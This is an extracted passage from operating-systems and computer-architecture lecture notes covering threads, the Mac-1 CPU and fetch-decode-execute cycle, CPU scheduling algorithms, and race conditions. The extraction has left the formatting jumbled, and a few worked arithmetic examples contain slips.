The PCB consists of the following information: • • • • • • The process state. Action of Kernel to Context Switch among Threads The threads share a lot of resources with other peer threads belonging to the same process. the program counter and the stack. Major Steps of Context Switching • • The values of the CPU registers are saved in the process table of the process that was running just before the clock interrupt occurred. Each time a clock interrupt occurs.running the same piece of code they need to have their own copy of the code in the main memory to be able to run. So a context switch among threads for the same process is easy.

However the abstraction is cleaner (threads can make system calls independently). However. and they all run in one process. Examples of user-level threads systems are Nachos and Java (on OSes that don’t support kernel threads). Synchronization and scheduling may be provided by the kernel. Kernel-level threads have more overhead in the kernel (a kernel thread control block) and more overhead in their use (manipulating them requires a system call). The operating system is unaware that a thread system is even running. The programmer of the thread library writes code to synchronize threads and to context switch them. Because the OS treats the running process like any other there is no additional kernel overhead for user-level threads. There are system calls to create threads and manipulate them in ways similar to processes. 66 . This is a heavy task and it takes a lot of time. the user-level threads only run when the OS has scheduled their underlying process (making a blocking system call blocks all the threads. User-level threads replicate some amount of kernel level functionality in user space.) Kernel Threads Some OS kernels support the notion of threads and schedule them directly.• I/O status information of the process. When the PCB of the currently executing process is saved the operating system loads the PCB of the next process that has to be run on CPU. User Threads User threads are implemented entriely in user space.

which directs the activities of the data path and input-output interface. which is the gateway through which data are sent and received from main memory and input-output devices. we briefly describe the components of Figure 6. A CPU consists of three major parts: 1. etc.1. and what must happen in it to cause useful things to happen . main memory. The internal registers. Here. the ALU and the connecting buses .sometimes called the data path. The control part.CHAPTER 5 THE CENTRAL PROCESSING UNIT (CPU) This chapter gives some more detail on the Central Processing Unit (CPU) and leads up to where we can write significant programs in assembly/machine code. e.the famous fetch-decode-execute cycle. 2. selecting ALU function. Then we give a qualitative discussion of how it executes program instructions.1: Mic-1 CPU (from Tanenbaum.g. The input-output interface. Finally we describe the execution of instructions in some detail. A fourth part. how the fetching. Structured Computer Organisation. First we will give an overview of how a processor and memory function together to execute a single machine instruction . 1990). decoding and execution of a machine instruction can be implemented by execution of a set of sequencing steps called a microprogram. page 170 onwards.1 shows the data path part of our hypothetical CPU from (Tanenbaum. In the system we describe. Figure 6. opening and closing access to buses. 3rd ed. i.to cause program instructions to be executed.) 67 .e. 3. The Architecture of Mic-1 Figure 6. the control part is implemented by microprogram. We will pay most attention to the data path part of the processor. Note on terminology: the term microprogram was devised in the early 1950s long before microprocessors were ever dreamt of. We will avoid going into much detail about the control. is never far from the CPU but from a logical point of view is best kept separate.

A and B (source) buses and C (destination) bus. B. when it's address. Internal Buses There are three internal buses. -1 Constants. use the same physical bus (connections) for both address and data. There would be problems if. they are not general purpose. it is used as storage area for local variables in subprograms. SP. i. IR.e.. the assembly language cannot address them. AMASK: Another constant. in particular those in many of the Intel 80X86 family. AC.avoids wasting time accessing main memory. A-Multiplexer (AMUX) 68 . what version of AC to use. For now. A. i. it is handy to have copies of them close by . meanwhile. accumulator: The accumulator is like the display register in a calculator. the stack is used for remembering where we came from when we call subprograms. stack-pointer: Used for maintaining a data area called the stack.F: General purpose registers. for example. but general purpose only for the micro programmer. i. Minor point to note: many buses.. each has a special use: PC. most operations use it implicitly as an unmentioned input. likewise for remembering data when an interrupt is being processed. . though we give brief descriptions below. it's simple to do . +1. it is also used as a communication medium for passing data to subprograms. program counter: The PC points to memory location that holds the next instruction to be executed.e. used for masking (anding) the address part of the instruction. 0.Registers There are 16 identical 16-bit registers. the output of the ALU was connected to AC. and the result of any operation is placed in it.the control part of the bus just has to make sure all users of the bus know when it's data. Temporary Instruction Register: Holds temporary versions of the instruction while it is being decoded. Instruction Register: Holds the instruction (the actual instruction data) currently being executed.e.. the answer would be continuously changing. TIR. SMASK: ditto for stack (relative) addresses. finally. AC was connected straight into the A input of the ALU and. External Buses The address bus and the data bus. we can ignore all the others. Latches A and B latches hold stable versions of A and B buses. But. AMASK and IR address.

1.it passes the ALU output straight through: shifted left. Effectively. Memory Address Register (MAR) and Memory Buffer Register (MBR) and Memory The MAR is a register which is used as a gateway . i.a `buffer' . Shifter The shifter is not a register .e. each of which can be addressed individually. . memory is like an array in C. we shall refer to this memory `array' as and the address of a general cell as as and so. rather than or. ALU In Mac-1a the ALU may perform just one of four functions: 0 . 2 straight through. Likewise the MBR (it might be better to call this memory data register) for the data bus. For brevity. . what was originally the contents of a memory location. 3 . To read from a memory cell. . ignored. the contents of the cell at address . shifted right or not shifted. and thus written to or read from. 69 . Basic or any other high-level language. in MAR. The memory is considered to be a collection of cells or locations. or .The ALU input A can be fed with either: (i) the contents of the A latch. . Any other functions have to be programmed. . Put an address. or (ii) the contents of MBR.onto the address bus. . the controller must cause the following to happen: 1. note `plus'.

. . Simple Model of a Computer .7. It is a feature of all general purpose computers that executable instructions and data occupy the same memory space.transferred to the AC or somewhere else.by asserting a write control line. We use to denote transfer: we say `A gets contents of x'.Part 3 Back in section 2. Think of an envelope with £100 in it. Requests write . At some time later. Think of an envelope containing . 3. But. why instructions and data cannot be mixed up together. . and your address on it. the controller can cause it to be . AC.by asserting a read control line. 2. IR.. sometimes . the data arrive in memory cell . Figure 6. Ret = PC. appear in MBR. . we produced a simple model of a computer. 3. 4. denotes contents of the address contained in another envelope. programs are organised so that there are blocks of instructions and blocks of data. Here we show it again. Put an address. .. denotes contents of location just . Put the data in MBR. we use a simple language called Register Transfer Language (RTL). 4. Register Transfer Language To describe the details of operation of the CPU. At some time later. . Requests read . the controller must cause something similar to happen: 1. in MAR. Pronounce this as `A gets B'.. the contents of from where. or even Reg denotes a register. The notation is as follows. In the case of . Often. except tidiness and efficiency. To write to a memory cell. 70 .2. R1 or R2. there is no fundamental reason.2.

) . add. put 1 in cell 3.3: Opcodes I have to renumber the program steps from P1-P14 to P101 . In this more realistic model. Were going to use the same program. The opcodes are as follows: Figure 6. for reasons which will soon become evident. The numerically coded instruction is given in four Hexadecimal digits.2: Mechanical Computer At the end of section 2. otherwise put 0 in cell 3.7 we admitted that we had been telling only half the truth! And we admitted that we had to fit the program into memory as well. here goes. and cell 3 contains an indicator of Pass (1) or Fail (0). store. 71 .. if the result is greater-than-or-equal-to 40.Figure 6. with appropriate numerical code (so that instructions be stored in memory)..the opcode. (We are adding marks. store the result in cell 2. Recall what was needed: add the contents of memory cell 0 to the contents of memory cell 1. And the program.the operand. the first digit gives the operation required (load. the person operating the CPU has no list of instructions available on the desk. Fine. the last three digits give the address or data .. but must read one instruction at a time from memory. we will use hexadecimal numbering. Also.

Code: 0 002 P107: Subtract contents of memory 4 from contents of AC.P101: Load contents of memory 0 into AC. Code: 1 004 P106: Load the contents of memory 2 into AC. Figure 6. Code: 1 002 P104: Load the constant 40 into the AC. jump to instruction P10c. Code 7 000 P10a: Store the contents of AC in memory 3. Code: 4 10c P109: Load the constant 0 into the AC. Code: 3 004 P108: If AC is positive. We now have to revise Figure 6.4: Mechanical Computer with Program 72 .4. Code: 2 001 P103: Store the contents of AC in memory 2. Code 7 001 P10d: Store the contents of AC in memory 3. Show the Instruction Register (IR). Show a Program Counter (PC) register that keeps track of the address of the next instruction. Code 1 003 P10e: Stop. this tells the CPU operator what to do for the current step. Code: 7 028 (40dec is 28Hex) P105: Store the contents of AC in memory 4.2 to show the program. Code: 0 000 P102: Add contents of memory 1 to contents of AC. Figure 6. Code 1 003 P10b: Jump to P10e. Code 6 10e P10c: Load the constant 1 into the AC. The revisions are as follows: • • • Show the additional memory (containing the program).

Execute: Perform the action required. then revise the pointing to the jumped-to instruction. if necessary. (b) put a tick against Read. (e) look at what is in AC and in MBR. If the operation is a jump. (f) write down a copy of the result and put it in AC. Thus. It is accumulator based: that is. we will neglect Tanenbaum's local and indirect for the meanwhile. 73 . (c) shout "Bus". Exercise. the contents of cell 1 (33) will arrive in MBR. (d) some time later.this signifies the operand. Point to the next instruction. what follows is an endless loop of the socalled fetch-decode-execute cycle.In this revised model. (f) take the number in the MBR and put it in the Instruction Register. How many bytes? There are two addressing modes: immediate and direct. There we have it. in the case shown. i. then all the operator does is take the operand (the jump-to address) and place it in the PC . What is the maximum number of words we can have in the main memory of Mac-1a? (neglect memory mapped input-output). Opcode is 2. if it is a JUMP type instruction. operand is 001.g. (e) wait until a new number arrives in the MBR. The main characteristics of Mac-1a are: data word length 16-bit.e. Execute: Do what is required that instruction. everything is done through AC. by which assembly programmers can program the machine. (b) Take the top digit (opcode). ready for the next Fetch. Decode: Figure out what the instruction means. Fetch: Read the next instruction and put it in the Instruction Register. Instruction Set We now examine the instruction set. E. `Add' is done as follows: put operand 1 in AC. We've already done this: (a) write 1 on a piece of paper and place it in MAR. thus.thus stopping the PC pointing to the next instruction in sequence. We will call the machine Mac-1a. Mac-1a is a restricted version of Tanenbaum's Mac-1. he/she must go through the following cycle of steps for each instruction step: Fetch: (a) Take the number in the PC. (c) take the number in the bottom three digits . (d) add one to the number in the PC . (b) place it in MAR. address size 12-bits. Go back to Fetch. result is put in AC. use the calculator to add them (22 + 33).3. (c) shout "Bus". we want to retain the result. The famous fetch-decode-execute cycle. look it up in Figure 6. and see what has to be done. Decode: (a) Take the number in IR.to make it point to the next step. the CPU operator has no list of instructions on his/her desk (the CPU). The CPU is a pretty busy place! The Fetch-Decode-Execute Cycle How does the CPU and its controller execute a sequence of instructions? Let us start by considering the execution the instruction at location 0x100. the contents of the AC is now copied to memory. a piece of paper with 55 on it would be put in to AC. Add contents of memory 1 to contents of AC (2 001). add to memory location.

described formally in register transfer language (RTL). Mnemonic: The name given to the instruction. The columns are as follows: Binary code for instruction: I. Action: What the instruction actually does.The Mac-1a programmer has no access to the PC or other CPU registers. Machine code. what the instruction looks like in computer memory. Long name: Descriptive name for instruction. 74 . Also. Used when coding in assembly code. assume that SP does not exist.5. for present purposes.e. A limited version of the Mac-1 instruction set is shown in Figure 6.

The micro programmed solution allows arbitrarily complex instructions to be built-up. Figure 6.fetch. 75 . It may also be more flexible.Figure 6. perhaps one optimised for execution of C programs. execute . etc.e. there were computers which differed only by their microcode.is done by a microcontroller which obeys a program of microinstructions. decode.just like any other circuit. i.6. 1990). The microcontroller has a set of inputs and a set of outputs . all you have to do is prepare a truth-table (6 input columns . control store takes up a lot of chip space. there were many machines that users could microprogram themselves. as you can see by examining (Tanenbaum. multiplexer. if implemented on a chip. Z. ALU. and generate the logic. for example. the more instructions there are. Therefore.op-code (4 bits) and N. 22 output columns). We might think of the microcontroller as a black-box such as that shown in Figure 6.5: Mac-1a Instruction Set (limited version of Mac-1) Microprogram Control versus Hardware Control Control of the CPU . it can be made from logic hardware. And.6: Controller Black-box. a lot faster than the microcode solution. either Microcontroller or Logic To design the circuit. microcode interpretation may be relatively slow -. another for COBOL programs. and.and gets slower. On the other hand. instead of microprogramming. There is no reason why this hardware circuit could not decode an instruction in ONE clock period.

Then the fashion switched to CISC. and compilers are becoming better. complexity of 76 . It comes down to a trade off. Structured Computer Organisation. less and less programmers use assembly code.7 shows the full Mac-1 CPU with its microcontroller unit.) CISC versus RISC Machines with large sets of complex (and perhaps slow) instructions (implemented with microcode). albeit with some special go-faster features that were not present on early RISC. probably implemented in logic are called RISC . Now the fashion is switching back to RISC.Figure 6. Most early machines . nowadays. CISC machines are easier to program in machine and assembly code (see next chapter).reduced instruction set computer.before about 1965 . Those with small sets of relatively simple instructions. Figure 6. because they have a richer set of instructions. are called CISC . But. 3rd ed.were RISC.complex instruction set computer.7: Mac-1 CPU including control (from Tanenbaum.

So. then more IO happens. Mac) had NO sophisticated CPU scheduling algorithms. a view of the scheduler as mediating between competing entities may be partially obsolete.2. They were single threaded and ran one process at a time until the user directs them to run another process. these assumptions are starting to break down. but not actually running on the CPU. In general. First of all. CPU bound processes: processes that perform lots of computation and do little IO.waiting for some event like IO to happen. then run for a while more (the next CPU burst). many applications are starting to be structured as multiple cooperating processes.ready to run. The job of the scheduler is to distribute the scarce resource of the CPU to the different processes ``fairly'' (according to some definition of fairness) and in a way that optimizes some performance criteria.almost everybody has several. Why is it important? Because it can have a big effect on resource utilization and the overall performance of the system. How long between IO operations? Depends on the process.`silicon' (microcode and CISC) or complexity of software (highly efficient optimising compilers and RISC). and pretty soon people will be able to afford lots. and what will happen in the future? Basic assumptions behind most scheduling algorithms: • • • There is a pool of runnable processes contending for the CPU. A process will run for a while (the CPU burst). the world went through a long period (late 80's.process is running on CPU. CPUs are not really that scarce . Each IO operation is followed by a short CPU burst to process the IO. early 90's) in which the most popular operating systems (DOS. The processes are independent and compete for resources. 77 . 5. Second. What are possible process states? • • • Running . have the exponential or hyper exponential distribution in Fig. CPU/IO burst cycle. Why? The IO will take a long time. By the way. perform some IO (the IO burst). When look at CPU burst times across the whole system. Tend to have a few long CPU bursts. Why was this true? More recent systems (Windows NT) are back to having sophisticated CPU scheduling algorithms. Ready . Waiting . and don't want to leave the CPU idle while wait for the IO to finish. What drove the change. How do processes behave? First. One of the things a scheduler will typically do is switch the CPU to another process when one process does IO. CPU Scheduling What is CPU scheduling? Determining which processes run when there are multiple runnable processes. • • IO Bound processes: processes that perform lots of IO operations.

Common example of interrupt handler . or wait for synchronization operation (like lock acquisition) to complete. A process does not give up CPU until it either terminates or performs IO. Difference between long and short term scheduling. Scheduler Efficiency: The scheduler doesn't perform any useful work. so any time it takes is pure overhead. typically want good throughput or turnaround time. Consider performance of FCFS algorithm for three compute-bound processes. When a process terminates. both of these are still usually important (after all.on completion of interrupt handler. When process switches from waiting to ready state (on completion of IO or acquisition of a lock. P2. throughput or turnaround time is not really relevant . One ready queue. Long term scheduler is given a set of processes and decides which ones should start to run. In batch systems. Short term scheduler decides which of the available jobs that long term scheduler has decided are runnable to actually run. (What is utilization. P2 (takes 3 seconds) and P3 (takes 3 seconds). Big difference: Batch and Interactive systems. need to make the scheduler very efficient. Throughput: number of processes completed per unit time. Let's start looking at several vanilla scheduling algorithms. it has preempted the running process. Could be because of IO request. Turnaround Time: mean time from submission to completion of process. want some computation to happen). they may suspend because of IO or because of preemption. Waiting Time: Amount of time spent ready to run but not running. If arrive in order P1. First-Come. for some systems. for example. by the way?). Another common case interrupt handler is the IO completion handler. And.some processes conceptually run forever. Response Time: Time between submission of requests and first response to the request. So. When process switches from running to ready .When do scheduling decisions take place? When does CPU choose which process to run? Are a variety of possibilities: • • When process switches from running to waiting. OS runs the process at head of queue. Once they start running. If scheduler switches processes in this case. but response time is usually a primary consideration. what is • Waiting Time? (24 + 27) / 3 = 17 78 . for example). In interactive systems. First-Served.timer interrupt in interactive systems. What if have 4 processes P1 (takes 24 seconds). because wait for child to terminate. P3. new processes come in at the end of the queue. • • How to evaluate scheduling algorithm? There are many possible criteria: • • • • • • CPU Utilization: Keep CPU utilization as high as possible.

P3. P4. If choose w = 1. Do a quick example. Big problem: how does scheduler figure out how long will it take the process to run? For long term scheduler running on a batch system. P1? What is • • • Waiting Time? (3 + 3) / 2 = 6 Turnaround Time? (3 + 6 + 30) = 13. system will cancel job before it finishes. Throughput? 30 / 3 = 10. Assume that after burst happens.• • Turnaround Time? (24 + 27 + 30) = 27. must use the past to predict the future. What would a standard priority scheduler do? Big problem with priority scheduling algorithms: starvation or blocking of low-priority processes. Lower numbers represent higher priorities. Consider 4 processes P1 (burst time 8).typically FCFS. Preemptive scheduler reruns scheduling decision when process becomes ready. use some other criteria . Each process is given a priority. P2 (burst time 1. sn be the predicted size of next CPU burst. P2. If too long. Throughput? 30 / 3 = 10. For short-term scheduler. then CPU executes process with highest priority. Preemptive vs. priority 2). the CPU preempts the running process and executes the new process. priority 1). Let Tn be the measured burst time of the nth burst. it allows every running process to finish its CPU burst. P3 (burst time 9) P4 (burst time 5) that arrive one time unit apart in order P1.make the priority of a process go up the longer it stays runnable but isn't run? 79 . So. Non-preemptive SJF scheduler. If multiple processes with same priority are runnable. Shortest-Job-First (SJF) can eliminate some of the variance in Waiting and Turnaround time. Then. system will hold off on running the process. SJF is an example of a priority-based scheduling algorithm. process is not reenabled for a long time (at least 100. In effect. users give pretty good estimates of overall running time. Standard way: use a timedecayed exponentially weighted average of previous CPU bursts for each process. If choose w = . P2 (burst time 4). Can use aging to prevent this . last observation has as much weight as entire rest of the history. where 0 <= w <= 1 and compute sn+1 = w Tn + (1 . the priorities of a given process change over time. What about if processes come in order P2. Non-preemptive scheduler only does scheduling decision when running process voluntarily gives up CPU. priority 4). P4 (burst time 1.5. If the new process has priority over running process. s0 is defined as some default constant or system average. only last observation has any weight. for example). user will give an estimate. choose a weighting factor w. Assume we have 5 processes P1 (burst time 10. P5 (burst time 5. priority 3). What does a preemptive SJF scheduler do? What about a non-preemptive scheduler? Priority Scheduling. With the exponential decay algorithm above. priority 3). it is optimal with respect to average waiting time. Usually pretty good . In fact. P3 (burst time 2.w)sn. w tells how to weight the past relative to future. P3.if it is too short.

must give response to users in a reasonable time. Save the state of the running process and run the next process. numbered 0. Rule of thumb . We will go over a simplified version that does not include kernel priorities. A simple example of a multilevel feedback queue scheduling algorithm. set the timer to go off after the time quantum amount of time expires. What happens. Problem with a small quantum context switch overhead. runs for as long as the time quantum). So. What about having a really small quantum supported in hardware? Then. Implementing round-robin requires timer interrupts. Consider the waiting times under round robin for 3 processes P1 (burst time 24). give it a quantum of 16. Have 3 queues. for example. it gives good response time. might have system. move to queue 1. execute a task in queue 2 only when queues 0 and 1 are empty. and what is average waiting time? What gives best waiting time? What happens with really a really small quantum? It looks like you've got a CPU that is 1/n as powerful as the real CPU. use an algorithm called round-robin scheduling. If process does IO before timer goes off. Of course. The point of the algorithm is to fairly allocate the CPU between processes. and P3 (burst time 4) with time quantum 4.like RR. When schedule a process. Let the first process in the queue run until it expires its quantum (i. with processes that have not recently used a lot of CPU resources given priority over processes that have. How well does RR work? Well. Give the CPU a bunch of registers and heavily pipeline the execution. What about a really big quantum? It turns into FCFS. If it expires its quantum. do a context switch. So. except processes can move between queues as their priority changes. A process goes into queue 0 when it becomes ready. Multilevel Feedback Queue Scheduling . then run the next process in the queue. Have a time quantum or time slice. where n is the number of processes. run a RR scheduler with a large quantum if in an interactive system or an FCFS scheduler if in a batch system. Feed the processes into the pipe one by one. classify processes into separate categories and give a queue to each category. Can also prevent starvation by increasing the priority of processes that have been idle for a long time. P2 (burst time 3). Multilevel Queue Scheduling . but can give bad waiting time. 80 . interactive and batch processes. In queue 2. Another example of a multilevel feedback queue scheduling algorithm: the Unix scheduler. In the meantime. Use computation to hide the latency of accessing memory.e. So.just run next process. you have something called multithreading. Similar to FCFS but with preemption. Treat memory access like IO . But if process expires its quantum.Like multilevel scheduling. When execute a process from queue 1. execute other threads. 2 with corresponding priority. If it expires its quantum. When run a process from queue 0. no problem . Typically. give it a quantum of 8 ms. 1. Could also allocate a percentage of the CPU to each queue.What about interactive systems? Cannot just let any process run on the CPU until it gives it up . move to queue 2.want 80 percent of CPU bursts to be shorter than time quantum. preempt queue 2 processes when a new process becomes ready.suspend the thread until the data comes back from the memory. with the priorities in that order. Can be used to give IO bound and interactive processes CPU priority over CPU bound processes. except have multiple queues.

drives down the processor utilization. The clock interrupt handler increments a CPU usage field in the PCB of the interrupted process every time it runs. then a high-priority thread tries to acquire the lock and blocks. serializing the computation. In general. give the thread the priority of the highest-priority thread waiting to get the lock. The CPU bound process then executes for a long time. when a process does not use much CPU recently. At this point the threads are synchronized. One thread acquires the lock. you can reduce the priority of your process to be ``nice'' to other processes (which may include your own). Everybody suspends until the lock that has the thread wakes up. Nice values modify the priority calculation as follows: • Priority = CPU usage field / 2 + base priority + nice value So. Problem is that priority inheritance makes the scheduling algorithm less efficient and increases the overhead. Any time a thread holds a lock that other threads are waiting on. If there is a tie. and will convoy their way through the lock. Anomalies and system effects associated with schedulers. The priorities of IO bound processes and interactive processes therefore tend to be high and the priorities of CPU bound processes tend to be low (which is what you want). it runs the process that has been ready longest. then suspends. multilevel feedback queue schedulers are complex pieces of software that must be tuned to meet requirements. Preemption can interact with synchronization in a multiprocessor context to create another nasty effect .Processes are given a base priority of 60. Why not? Because threads don't hold resources and prevent other threads from accessing them. Other threads come along. it recalculates the priority and CPU usage field for every process according to the following formulas. The system always runs the highest priority process. So. How to prevent priority inversions? Use priority inheritance.the convoy effect. Priority interacts with synchronization to create a really nasty effect called priority inversion. the middle-priority threads block the high-priority thread. Unix also allows users to provide a ``nice'' value for each process. • • CPU usage field = CPU usage field / 2 Priority = CPU usage field / 2 + base priority So. Consider a FCFS algorithm with several IO bound and one CPU bound process. its priority rises. Every second. with lower numbers representing higher priorities. and need to acquire the lock to perform their operations. don't get convoy effects caused by suspending a thread competing for access to a resource. The system clock generates an interrupt between 50 and 100 times a second. If have non-blocking synchronization via operations like LL/SC. Any middle-priority threads will prevent the low-priority thread from running and unlocking the lock. During this time all of the IO bound processes have their IO requests satisfied and move back 81 . so we will assume a value of 60 clock interrupts per second. A priority inversion happens when a low-priority thread acquires a lock. In effect. All of the IO bound processes execute their bursts quickly and queue up for access to the IO device. Similar effect when scheduling CPU and IO bound processes.

then idle while the IO bound processes wait in the run queues for their short CPU bursts. CPU/Process Scheduling The assignment of physical processors to processes allows processors to accomplish work.it is busy for a time while it processes the IO requests. The problem of determining when processors should be assigned and to which processes is called processor scheduling or CPU scheduling. and all of the IO bound processes run for a short time then queue up again for the IO devices. Some of these goals depends on the system one is using for example batch system. It can be shown that any scheduling algorithm that favors some class of jobs hurts another class of jobs. a scheduler should consider fairness. even if it means delay in payroll processes. response time. Goals of scheduling (objectives) In this section we try to answer following question: What the scheduler try to achieve? Many objectives must be considered in the design of a scheduling discipline. the CPU bound process gets off the CPU. a convoy effect happens when a set of processes need to use a resource for a short time. Throughput: A scheduler should maximize the number of jobs processed per unit time. Policy Enforcement: The scheduler has to make sure that system's policy is enforced.the CPU bound process is running instead . if the local policy is safety then the safety control processes must be able to run whenever they want to. In this case an easy solution is to give IO bound processes priority over CPU bound processes. and one process holds the resource for a long time. turnaround time. A little thought will show that some of these goals are contradictory. efficiency.into the run queue. Note that giving equivalent or equal time is not fair.so the IO device idles. throughput. For example. but there are also some goals that are desirable in all systems. In general. If the CPU and all the Input/Output devices can be kept running all the time. A scheduler makes sure that each process gets its fair share of the CPU and no process can suffer indefinite postponement. Efficiency: Scheduler should keep the system (or in particular CPU) busy cent percent of the time when possible. But they don't run . The amount of CPU time available is finite. the operating system must decide which one first. etc. The part of the operating system concerned with this decision is called the scheduler. Think of safety control and payroll at a nuclear plant. Turnaround: A scheduler should minimize the time batch users must wait for an output. Response Time: A scheduler should minimize the response time for interactive user. When more than one process is runable. interactive system or real-time system. after all. Causes poor utilization of the other resources in the system. more work gets done per second than if some components are idle. blocking all of the other processes. Finally. Result is poor utilization of IO device .. etc. General Goals Fairness: Fairness is important under all circumstances. In particular. Preemptive Vs No Preemptive Scheduling 82 . and algorithm it uses is called the scheduling algorithm.

3. response times are more predictable because incoming high priority jobs can not displace waiting jobs. Following are some characteristics of nonpreemptive scheduling 1. Nonpreemptive Scheduling A scheduling discipline is nonpreemptive if. 2. In nonpreemptive system. Round Robin Scheduling. once a process has been given the CPU. a scheduler executes jobs in the following two situations. once a process has been given the CPU can taken away. short jobs are made to wait by longer jobs but the overall treatment of all processes is fair. the CPU cannot be taken away from that process. Following are some scheduling algorithms we will study • • • • • • • FCFS Scheduling. When a process switches from running state to the waiting state. Scheduling Algorithms CPU Scheduling deals with the problem of deciding which of the processes in the ready queue is to be allocated the CPU. Multilevel Queue Scheduling. When a process terminates. In nonpreemptive system. SRT Scheduling. The strategy of allowing processes that are logically runable to be temporarily suspended is called Preemptive Scheduling and it is contrast to the "run to completion" method. Priority Scheduling. b. First-Come-First-Served (FCFS) Scheduling Other names of this algorithm are: • First-In-First-Out (FIFO) 83 . SJF Scheduling. a.The Scheduling algorithms can be divided into two categories with respect to how they deal with clock interrupts. Preemptive Scheduling A scheduling discipline is preemptive if. In nonpreemptive scheduling. Multilevel Feedback Queue Scheduling.

FCFS scheme is not useful in scheduling interactive users because it cannot guarantee good response time. the average waiting time under round robin scheduling is often quite long. fairest and most widely used algorithm is round robin (RR). the CPU is preempted and given to the next process waiting in a queue. Round Robin Scheduling One of the oldest. Processes are dispatched according to their arrival time on the ready queue. In other words. The First-Come-First-Served algorithm is rarely used as a master scheme in modern operating systems but it is often embedded within other schemes. Shortest-Job-First (SJF) Scheduling Other name of this algorithm is Shortest-Process-Next (SPN). it runs to completion. If a process does not complete before its CPU-time expires. when CPU is available. it is assigned to the process that has smallest next CPU burst. once a process has a CPU. In any event. In the round robin scheduling. 84 . Shortest-Job-First (SJF) is a non-preemptive discipline in which waiting job (or process) with the smallest estimated run-time-to-completion is run next. The only interesting issue with round robin scheme is the length of the quantum. The code for FCFS scheduling is simple to write and understand. Setting the quantum too short causes too many context switches and lower the CPU efficiency. Being a nonpreemptive discipline.• • Run-to-Completion Run-Until-Done Perhaps. The FCFS scheduling is fair in the formal sense or human sense of fairness but it is unfair in the sense that long jobs make short jobs wait and unimportant jobs make important jobs wait. it is probably optimal. First-Come-First-Served algorithm is the simplest scheduling algorithm is the simplest scheduling algorithm. FCFS is more predictable than most of other schemes since it offers time. processes are dispatched in a FIFO manner but are given a limited amount of CPU time called a time-slice or a quantum. The SJF scheduling is especially appropriate for batch jobs for which the run times are known in advance. Since the SJF scheduling algorithm gives the minimum average time for a given set of processes. setting the quantum too long may cause poor response time and approximates FCFS. One of the major drawback of this scheme is that the average time is often quite long. On the other hand. The preempted process is then placed at the back of the ready list. The SJF algorithm favors short jobs (or processors) at the expense of longer ones. simplest. Round Robin Scheduling is preemptive (at the end of time-slice) therefore it is effective in timesharing environments in which the system needs to guarantee reasonable response times for interactive users.

Internally defined priorities use some measurable quantities or qualities to compute priority of a process. Type or amount of funds being paid for computer use. File requirements. it is not useful in timesharing environment in which reasonable response time must be guaranteed. But in the development environment users rarely know how their program will execute. Priority can be defined either internally or externally. That is. the lower the priority and vice versa. An SJF algorithm is simply a priority algorithm where the priority is the inverse of the (predicted) next CPU burst. Memory requirements. Equal-Priority processes are scheduled in FCFS order. and priority is allowed to run. and this information is not usually available. number of open files. In the production environment where the same jobs run regularly.The obvious problem with SJF scheme is that it requires precise knowledge of how long a job or process will run. Externally defined priorities are set by criteria that are external to operating system such as • • • • The importance of process. The best SJF algorithm can do is to rely on user estimates of run times. Examples of Internal priorities are • • • • Time limits. Politics. The department sponsoring the work. A non-preemptive priority algorithm will simply put the new process at the head of the ready queue. Priority Scheduling The basic idea is straightforward: each process is assigned a priority. Priority scheduling can be either preemptive or non preemptive • • A preemptive priority algorithm will preemptive the CPU if the priority of the newly arrival process is higher than the priority of the currently running process. 85 . CPU Vs I/O requirements. for example. SJF is non preemptive therefore. it may be possible to provide reasonable estimate of run time. based on the past performance of the process. The shortest-Job-First (SJF) algorithm is a special case of general priority scheduling algorithm. the longer the CPU burst. Like FCFS.

in the above figure no process in the batch queue could run unless the queues for system processes. for instance In a multilevel queue scheduling processes are permanently assigned to one queues. A solution to the problem of indefinite blockage of the low-priority process is aging. It uses many ready queues and associate a different priority with each queue. based on some property of the process. and interactive editing processes will all empty. and run that process either • • Preemptive or Non-preemptively Each queue has its own scheduling algorithm or policy. For instance. this policy has the advantage of low scheduling overhead. interactive processes. Aging is a technique of gradually increasing the priority of processes that wait in the system for a long period of time. but it is inflexible.A major problem with priority scheduling is indefinite blocking or starvation. If the process uses too much CPU time it will moved 86 . The processes are permanently assigned to one another. such as • • • Memory size Process priority Process type Algorithm choose the process from the occupied queue that has the highest priority. • • 80% of the CPU time to foreground queue using RR. 20% of the CPU time to background queue using FCFS. which it can then schedule among the processes in its queue. Multilevel Feedback Queue Scheduling Multilevel feedback queue-scheduling algorithm allows a process to move between queues. Since processes do not move between queue so. The Algorithm chooses to process with highest priority from the occupied queue and run that process either preemptively or unpreemptively. Possibility 1 If each queue has absolute priority over lower-priority queues then no process in the queue could run unless the queue for the highest-priority processes were all empty. For example. Multilevel Queue Scheduling A multilevel queue scheduling algorithm partitions the ready queue in several separate queues. Possibility II If there is a time slice between the queues then each queue gets a certain amount of CPU times.

without using interrupts. among processes. When two or more processes are reading or writing some shared data and the final result depends on who runs precisely when. only when queue 2 run on a FCFS basis. If it does not finish within 8 milliseconds time. there is a need for a well-structured communication. • • • • A process entering the ready queue is placed in queue 0. If interrupts are not disabled than the linked list could become corrupt. are called race conditions. it is preempted and placed into queue 2. If the ready queue is implemented as a linked list and if the ready queue is being manipulated during the handling of an interrupt.to a lower-priority queue. processes that are working together share some common storage (main memory. then interrupts must be disabled to prevent another interrupt before the first one completes. Race conditions are also possible in Operating Systems. Critical Section How to avoid race conditions? 87 . Only one ‘customer’ thread at a time should be allowed to examine and update the shared variable. it is moved to the tail of queue 1.` CHAPTER 6 INTERPROCESS COMMUNICATION Since processes frequently needs to communicate with other processes therefore. only when queue 0 and queue 1 are empty.) that each process can read and write. Race Conditions In operating systems. If it does not complete. Processes in queue 2 run on a FCFS basis. Note that this form of aging prevents starvation. Similarly. Concurrently executing threads that share data need to synchronize their operations and processing in order to avoid race condition on shared data. file etc. a process that wait too long in the lower-priority queue may be moved to a higher-priority queue may be moved to a highest-priority queue.

Codes use a data structure while any part of it is possibly being altered by another thread. one of the processes waiting. The characteristic properties of the code that form a Critical Section are • • • • Codes that reference one or more variables in a “read-update-write” fashion while any of those variables is possibly being altered by another thread. In this fashion. To avoid race conditions and flawed results. No assumptions are made about relative speeds of processes or number of CPUs. Note that mutual exclusion needs to be enforced only when processes access shared modifiable data . while that process has finished executing the shared variable. all other processes desiring to do so at the same time moment should be kept waiting. while one process executes the shared variable. Here. each process executing the shared data (variables) excludes all others from doing so simultaneously. That part of the program where the shared memory is accessed is called the Critical Section. the important point is that when one process is executing shared modifiable data in its Mutual Exclusion A way of making sure that if one process is using a shared modifiable data. Mutual Exclusion Conditions If we could arrange matters such that no two processes were ever in their critical sections simultaneously. we could avoid race conditions. the other processes will be excluded from doing the same thing. one of the processes waiting to do so should be allowed to proceed. Formally. • • No 